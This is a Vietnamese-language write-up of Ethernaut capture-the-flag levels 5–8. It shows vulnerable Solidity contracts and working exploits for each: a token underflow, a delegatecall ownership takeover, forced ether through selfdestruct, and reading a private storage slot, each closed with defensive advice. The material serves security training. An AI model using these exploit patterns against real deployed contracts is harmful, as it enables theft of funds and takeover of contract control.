The Ethernaut writeups - Part 2: 5-8


Chào các bạn, hôm nay chúng ta sẽ đến với phần 2 của chuỗi bài Blockchain - hacking smart contract with Ethernaut CTF

Ở bài trước, chúng ta đã được tiếp cận với những lỗ hổng cơ bản và dễ dàng nhất, ở phần này chúng ta sẽ tiếp cận 4 lỗ hổng khác với độ khó cao hơn, mình sẽ giải thích từng bước cụ thể kèm phân tích để các bạn có thể nắm được trực quan và đơn giản nhất.

Hi vọng sẽ mang lại nhiều điều thú vị cho các bạn.

Update 2022 Feb: Bài viết đã được update để phù hợp với ethernaut & solidity version mới.

5. Token

Nhiệm vụ: Có 20 token trong tay, ta cần chôm ở đâu đó vài token nữa (càng nhiều càng tốt)

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Token {

 mapping(address => uint) balances;
 uint public totalSupply;

 constructor(uint _initialSupply) public {
  balances[msg.sender] = totalSupply = _initialSupply;
 }

 function transfer(address _to, uint _value) public returns (bool) {
  require(balances[msg.sender] - _value >= 0);
  balances[msg.sender] -= _value;
  balances[_to] += _value;
  return true;
 }

 function balanceOf(address _owner) public view returns (uint balance) {
  return balances[_owner];
 }
}

Phân tích

 • Trong các ngôn ngữ lập trình static type như C/C++/C#/Java, có lẽ chúng ta hầu như không xa lạ gì với khái niệm overflow - hiện tượng tràn số khi tính toán số lớn hơn giá trị MAX của kiểu dữ liệu đã khao báo. Nhưng có một khái niệm nữa ít được để ý hơn nhưng cũng vô cùng quan trọng, đó là underflow - hiện tượng mà khi số nhỏ dưới giá trị MIN của kiểu dữ liệu đã khai báo thì số đó sẽ được quay vòng trở lại từ MAX, thật tai hại nếu không handle trường hợp này.
 • Trong bài này, kiểu dữ liệu đang dùng là uint256, giới hạn từ 0 cho tới 22562^{256}
 • Ở đây ta có đoạn
require(balances[msg.sender] - _value >= 0);

những tưởng rằng điều kiện này chỉ đạt được khi balance của msg.sender lớn hơn giá trị value; nhưng không, điều kiện này sẽ trở thành auto true. Thật vậy, nếu như balance >= value thì hiển nhiên sẽ là true, còn nếu như balance < value thì khi balance - value sẽ xảy ra hiện tượng underflow và trở nên vô cùng lớn, theo đó điệu kiện cũng sẽ là true. Tóm lại, ta sẽ luôn luôn pass.

Solution

 • Trên Chrome console để kiểm tra balance hiện tại:
(await contract.balanceOf(player)).toString();
> '20'
 • Do điều kiện auto pass, ta sẽ transfer cho một địa chỉ nào đó một giá trị lớn hơn 20 - là số token hiện tại của ta, khi đó phép toán balances[msg.sender] -= value sẽ xảy ra hiện tượng underflow và ta sẽ sở hữu một lượng vô cùng lớn token:
contract.transfer(level, 21);
 • Kiểm tra lại balance một lần nữa, wow !! !
await contract.balanceOf(player).then(x => x.toNumber());
1.157920892373162e77;
 • Submit & all done!

Bình luận

 • Overflow hay Underflow đều nguy hiểm, hãy dùng thư viện Safe Math cho bất cứ phép toán nào của bạn.

6. Delegation

Nhiệm vụ: Chiếm quyền owner.

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Delegate {

 address public owner;

 constructor(address _owner) public {
  owner = _owner;
 }

 function pwn() public {
  owner = msg.sender;
 }
}

contract Delegation {

 address public owner;
 Delegate delegate;

 constructor(address _delegateAddress) public {
  delegate = Delegate(_delegateAddress);
  owner = msg.sender;
 }

 fallback() external {
  (bool result,) = address(delegate).delegatecall(msg.data);
  if (result) {
   this;
  }
 }
}

Phân tích

 • Để từ trong contract này gọi hàm của contract khác, ngoài cách dùng instance của contract khác để gọi, solidity cung cấp cho ta một số hàm low-level khác để thay thế: đó là calldelegatecall. Ngay từ chú thích low-level ta đã biết rằng đây là những hàm nguy hiểm rồi, nên việc hiểu rõ cách sử dụng chúng là một điều tất yếu.
 • Việc giải thích cụ thể về calldelegatecall khá dài và nằm ngoài phạm vi bài viết. Bạn có thể đọc thêm tại đây. Cơ bản thì delegatecall chỉ mượn tên hàm của contract khác, mọi thông tin về storage vẫn là storage của contract đang sử dụng.
 • Contract Delegate có hàm pwn() để trao quyền owner, vậy mục tiêu của chúng ta là làm sao để kích hoạt được hàm này.
 • Contract Delegation có fallback function sử dụng delegatecall, nó gợi ý cho chúng ta trigger fallback với msg.data chính là hàm pwn()
 • fallback function trong contract Delegation không có payable, nghĩa là không thể nhận ether, ta vẫn có thể kích hoạt được nó bằng cách send cho nó 0 ether, thật là vi diệu!
 • Một lưu ý về msg.data: để truyền vào hàm pwn(), ta không phải truyền plain text, mà solidity sẽ gọi bằng function signature, tức 4 byte đầu của chuỗi hash("pwn()") cụ thể ta sẽ phải truyền vào tham số như sau: web3.eth.abi.encodeFunctionSignature("pwn()")

Solution

 • Trên Chrome console, kiểm tra contract owner:
await contract.owner();
 • Send 0 ether kèm data để trigger fallback:
contract.sendTransaction({
 data: web3.eth.abi.encodeFunctionSignature("pwn()"),
});
 • Kiểm tra lại contract owner xem đã là mình chưa:
await contract.owner();
 • Submit & all done!

Bình luận

 • Hãy luôn luôn hiểu rõ những hàm bạn code, đặc biệt là các hàm low-level.
 • Hạn chế tối đa sử dụng delegatecall cũng như các hàm low-level khác.

7. Force

Nhiệm vụ: Bằng cách nào đó chuyển cho một contract rỗng một ít ether.

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Force {/*

          MEOW ?
     /\_/\  /
  ____/ o o \
 /~____ =ø= /
 (______)__m_m)

*/}

Phân tích

 • Contract không tí code nào - wtf ?
 • Đây là một bài thuộc dạng bài biết thì rất dễ, không biết thì không biết đằng nào mà lần. Điều ta cần biết duy nhất chính là hàm selfdestruct.
 • Với một contract, khi gọi hàm selfdestruct(someone_addr) thì contract sẽ hủy và toàn bộ tiền của contract sẽ gửi về someone_addr, đây có thể là địa chỉ bất kì của người dùng hoặc của contract nào đó.

Solution

 • Trên Remix IDE, chuẩn bị một contract có thể gửi tiền vào, và một hàm thực hiện selfdestruct trong đó, nhớ thay địa chỉ trong selfdestruct bằng địa chỉ instance của bạn:
contract AnotherContract {

  function sendAll() public {
    // replace by your instance address
    selfdestruct(0xb3a12d511131ada7a145a5a9dc7399756cae6c4b);
  }

  receive() external payable {

  }
}
 • Compile & send cho AnotherContract vài ether.
 • Gọi hàm sendAll() để hủy contract & gửi tiền vào contract đề bài yêu cầu.
 • Submit & all done!

8. Vault

Nhiệm vụ: Tìm password và unlock

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Vault {
 bool public locked;
 bytes32 private password;

 constructor(bytes32 _password) public {
  locked = true;
  password = _password;
 }

 function unlock(bytes32 _password) public {
  if (password == _password) {
   locked = false;
  }
 }
}

Phân tích

 • Ta biết rằng blockchain là minh bạch, và mọi thông tin trên đó ta đều có thể nhìn thấy được, kể cả những biến khai báo là private. Và trong bài này, điều đó không là ngoại lệ.
 • web3js cung cấp cho ta một hàm web3.eth.getStorageAt để lấy thông tin trên blockchain. Ta sẽ dùng nó để tìm password.

Solution

 • Contract Vault có 2 tham số: lockedpassword, nó sẽ lưu locked tại vị trí 0 và password tại vị trí 1 trong storage.
 • Trong chrome console, ta chạy lệnh sau
> await web3.eth.getStorageAt(instance, 1)
> '0x412076657279207374726f6e67207365637265742070617373776f7264203a29'
 • Tiến hành unlock:
contract.unlock(
 "0x412076657279207374726f6e67207365637265742070617373776f7264203a29"
);
 • Kiểm tra lại tình trạng khóa:
await contract.locked();
> false;
 • Submit & all done!

Bình luận

 • private trong blockchain hay solidity nói riêng chỉ là một phương thức để ngăn quyền truy xuất trong contract mà thôi, chứ không có nghĩa là nó bí mật đối với người dùng.
 • Nếu muốn thông tin private, hãy mã hóa nó trước khi đưa lên blockchain.
 • Không nên lưu trữ các thông tin nhạy cảm trên blockchain, dù nó có được mã hóa hay không.